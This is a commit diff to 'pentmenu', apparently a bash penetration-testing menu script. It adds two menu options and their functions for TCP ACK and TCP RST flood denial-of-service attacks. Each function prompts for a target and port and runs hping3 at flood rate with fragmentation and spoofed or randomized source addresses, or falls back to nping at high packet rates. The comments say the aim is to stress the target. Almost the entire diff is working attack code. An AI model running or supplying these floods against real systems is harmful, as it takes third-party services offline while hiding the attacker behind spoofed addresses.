Added TCP DOS options
Added TCP ACK Flood and TCP RST Flood

diff --git a/pentmenu b/pentmenu
--- a/pentmenu
+++ b/pentmenu
@@ -218,11 +218,17 @@ checkuptime()
 dosmenu()
 {
 #display a menu for the DOS module using bash select
-		dosmenu=("TCP SYN Flood" "UDP Flood" "SSL DOS" "Slowloris" "Distraction Scan" "Go back")
+		dosmenu=("TCP SYN Flood" "TCP ACK Flood" "TCP RST Flood" "UDP Flood" "SSL DOS" "Slowloris" "Distraction Scan" "Go back")
 	select dosopt in "${dosmenu[@]}"; do
 #TCP SYN Flood DOS
  	if [ "$dosopt" = "TCP SYN Flood" ]; then
 		synflood
+#TCP ACK Flood
+	elif [ "$dosopt" = "TCP ACK Flood" ]; then
+		ackflood
+#TCP RST Flood
+	elif [ "$dosopt" = "TCP RST Flood" ]; then
+		rstflood
 #UDP Flood		
  	elif [ "$dosopt" = "UDP Flood" ]; then
 		udpflood
@@ -327,6 +333,170 @@ synflood()
 	fi
 }
 ##END TCPSYNFLOOD##
+###################
+
+#####################
+##START TCPACKFLOOD##
+ackflood()
+{		echo "TCP ACK Flood uses hping3...checking for hping3..."
+	if test -f "/usr/sbin/hping3"; then echo "hping3 found, continuing!";
+#hping3 is found, so use that for TCP ACK Flood
+		echo "Enter target:"
+#need a target IP/hostname
+	read -i $TARGET -e TARGET
+#need a port to send TCP ACK packets to
+		echo "Enter target port"
+	read -i $PORT -e PORT
+#What source address to use? Manually defined, or random, or outgoing interface IP?
+		echo "Enter Source IP, or [r]andom or [i]nterface IP (default):"
+	read -i $SOURCE -e SOURCE
+	: ${SOURCE:=i}
+#shoud any data be sent with the ACK packet?  Default is to send no data
+	echo "Send data with ACK packet? [y]es or [n]o (default)"
+	read -i $SENDDATA -e SENDDATA
+	: ${SENDDATA:=n}
+	if [[ $SENDDATA = y ]]; then
+#we've chosen to send data, so how much should we send?  
+	echo "Enter number of data bytes to send (default 3000):"
+	read -i $DATA -e DATA
+	: ${DATA:=3000}
+#If not an integer is entered, use default
+	if ! [[ "$DATA" =~ ^[0-9]+$ ]]; then
+	DATA=3000 && echo "Invalid integer!  Using data length of 3000 bytes"
+	fi
+#if $SENDDATA is not equal to y (yes) then send no data
+	else DATA=0 
+	fi
+#start TCP ACK flood using values defined earlier
+#note that virtual fragmentation is set.  The default for hping3 is 16 bytes.
+#fragmentation should therefore place more stress on the target system
+	if [[ "$SOURCE" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]]; then
+		echo "Starting TCP ACK Flood. Use 'Ctrl c' to end and return to menu"
+		sudo hping3 --flood -d $DATA --frag --spoof $SOURCE -p $PORT -A $TARGET
+	elif [ "$SOURCE" = "r" ]; then
+		echo "Starting TCP ACK Flood. Use 'Ctrl c' to end and return to menu"
+		sudo hping3 --flood -d $DATA --frag --rand-source -p $PORT -A $TARGET
+	elif [ "$SOURCE" = "i" ]; then
+		echo "Starting TCP ACK Flood. Use 'Ctrl c' to end and return to menu"
+		sudo hping3 -d $DATA --flood --frag -p $PORT -A $TARGET
+	else echo "Not a valid option!  Using interface IP"
+		echo "Starting TCP ACK Flood. Use 'Ctrl c' to end and return to menu"
+		sudo hping3 --flood -d $DATA --frag -p $PORT -A $TARGET
+	fi
+#No hping3 so using nping for TCP ACK Flood
+	else echo "hping3 not found :( trying nping instead"
+		echo ""
+		echo "Trying TCP ACK Flood with nping..this will work but is not ideal"
+#need a valid target ip/hostname
+		echo "Enter target:"
+	read -i $TARGET -e TARGET
+#need a valid target port
+		echo "Enter target port:"
+	read -i $PORT -e PORT
+#define source IP or use outgoing interface IP
+		echo "Enter Source IP or use [i]nterface IP (default):"
+	read -i $SOURCE -e SOURCE
+		: ${SOURCE:=i}
+#How many packets to send per second?  default is 10k
+		echo "Enter number of packets to send per second (default is 10,000):"
+	read RATE
+		: ${RATE:=10000}
+#how many packets in total to send?
+#default is 100k, so using default values will send 10k packets per second for 10 seconds
+		echo "Enter total number of packets to send (default is 100,000):"
+	read TOTAL
+		: ${TOTAL:=100000}
+		echo "Starting TCP ACK Flood..."
+#begin TCP ACK flood using values defined earlier
+	if 	[ "$SOURCE" = "i" ]; then
+		sudo nping --tcp --dest-port $PORT --flags ack --rate $RATE -c $TOTAL -v-1 $TARGET
+	else sudo nping --tcp --dest-port $PORT --flags ack --rate $RATE -c $TOTAL -v-1 -S $SOURCE $TARGET
+	fi
+	fi
+}
+##END TCPACKFLOOD##
+###################
+
+#####################
+##START TCPRSTFLOOD##
+rstflood()
+{		echo "TCP RST Flood uses hping3...checking for hping3..."
+	if test -f "/usr/sbin/hping3"; then echo "hping3 found, continuing!";
+#hping3 is found, so use that for TCP RST Flood
+		echo "Enter target:"
+#need a target IP/hostname
+	read -i $TARGET -e TARGET
+#need a port to send TCP RST packets to
+		echo "Enter target port"
+	read -i $PORT -e PORT
+#What source address to use? Manually defined, or random, or outgoing interface IP?
+		echo "Enter Source IP, or [r]andom or [i]nterface IP (default):"
+	read -i $SOURCE -e SOURCE
+	: ${SOURCE:=i}
+#shoud any data be sent with the RST packet?  Default is to send no data
+	echo "Send data with RST packet? [y]es or [n]o (default)"
+	read -i $SENDDATA -e SENDDATA
+	: ${SENDDATA:=n}
+	if [[ $SENDDATA = y ]]; then
+#we've chosen to send data, so how much should we send?  
+	echo "Enter number of data bytes to send (default 3000):"
+	read -i $DATA -e DATA
+	: ${DATA:=3000}
+#If not an integer is entered, use default
+	if ! [[ "$DATA" =~ ^[0-9]+$ ]]; then
+	DATA=3000 && echo "Invalid integer!  Using data length of 3000 bytes"
+	fi
+#if $SENDDATA is not equal to y (yes) then send no data
+	else DATA=0 
+	fi
+#start TCP RST flood using values defined earlier
+#note that virtual fragmentation is set.  The default for hping3 is 16 bytes.
+#fragmentation should therefore place more stress on the target system
+	if [[ "$SOURCE" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]]; then
+		echo "Starting TCP RST Flood. Use 'Ctrl c' to end and return to menu"
+		sudo hping3 --flood -d $DATA --frag --spoof $SOURCE -p $PORT -R $TARGET
+	elif [ "$SOURCE" = "r" ]; then
+		echo "Starting TCP RST Flood. Use 'Ctrl c' to end and return to menu"
+		sudo hping3 --flood -d $DATA --frag --rand-source -p $PORT -R $TARGET
+	elif [ "$SOURCE" = "i" ]; then
+		echo "Starting TCP RST Flood. Use 'Ctrl c' to end and return to menu"
+		sudo hping3 -d $DATA --flood --frag -p $PORT -R $TARGET
+	else echo "Not a valid option!  Using interface IP"
+		echo "Starting TCP RST Flood. Use 'Ctrl c' to end and return to menu"
+		sudo hping3 --flood -d $DATA --frag -p $PORT -R $TARGET
+	fi
+#No hping3 so using nping for TCP RST Flood
+	else echo "hping3 not found :( trying nping instead"
+		echo ""
+		echo "Trying TCP RST Flood with nping..this will work but is not ideal"
+#need a valid target ip/hostname
+		echo "Enter target:"
+	read -i $TARGET -e TARGET
+#need a valid target port
+		echo "Enter target port:"
+	read -i $PORT -e PORT
+#define source IP or use outgoing interface IP
+		echo "Enter Source IP or use [i]nterface IP (default):"
+	read -i $SOURCE -e SOURCE
+		: ${SOURCE:=i}
+#How many packets to send per second?  default is 10k
+		echo "Enter number of packets to send per second (default is 10,000):"
+	read RATE
+		: ${RATE:=10000}
+#how many packets in total to send?
+#default is 100k, so using default values will send 10k packets per second for 10 seconds
+		echo "Enter total number of packets to send (default is 100,000):"
+	read TOTAL
+		: ${TOTAL:=100000}
+		echo "Starting TCP RST Flood..."
+#begin TCP RST flood using values defined earlier
+	if 	[ "$SOURCE" = "i" ]; then
+		sudo nping --tcp --dest-port $PORT --flags rst --rate $RATE -c $TOTAL -v-1 $TARGET
+	else sudo nping --tcp --dest-port $PORT --flags rst --rate $RATE -c $TOTAL -v-1 -S $SOURCE $TARGET
+	fi
+	fi
+}
+##END TCPRSTFLOOD##
 ###################
 
 ##################
